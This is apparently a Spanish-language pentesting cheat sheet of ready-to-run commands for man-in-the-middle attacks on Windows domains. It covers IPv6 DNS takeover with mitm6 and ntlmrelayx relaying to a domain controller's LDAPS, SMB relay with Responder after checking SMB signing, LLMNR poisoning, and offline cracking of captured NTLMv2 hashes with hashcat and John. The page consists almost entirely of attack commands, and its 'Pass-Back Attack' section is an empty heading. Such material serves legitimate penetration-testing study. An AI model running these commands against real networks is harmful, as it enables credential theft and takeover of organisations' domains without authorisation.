Ataques MITM

MITM6

sudo python3 mitm6.py -d domain.local
impacket-ntlmrelayx -6 -t ldaps://<IP_DC> -wh <fakewpad>.domain.local -l lootme

SMBRelay

#Comprobando firmas SMB
crackmapexec smb 10.0.2.6
nmap -p 445 --script smb2-security-mode <IP> -Pn
#Ataque con Responder
#Editar el archivo de configuración de Responder y desactivar las opciones SMB y HTTP -> /etc/responder/Responder.conf
sudo responder -I eth0 -dw
impacket-ntlmrelayx -t <IP_VÍCTIMA> -smb2support
#(Actualizar este punto porque parece que los comandos y la ejecución está bastante deprecada)

LLMNR

#Responder
sudo responder -I eth0 -dw
#Cracking NTLMv2 con Hashcat
hashcat -m 5600 <HASH_FILE> /usr/share/wordlists/rockyou.txt
#Alternativa con John
john --wordlist=/usr/share/wordlists/rockyou.txt -rules /usr/share/john/rules/best64.rule <HASH_FILE>

Pass-Back Attack

Última actualización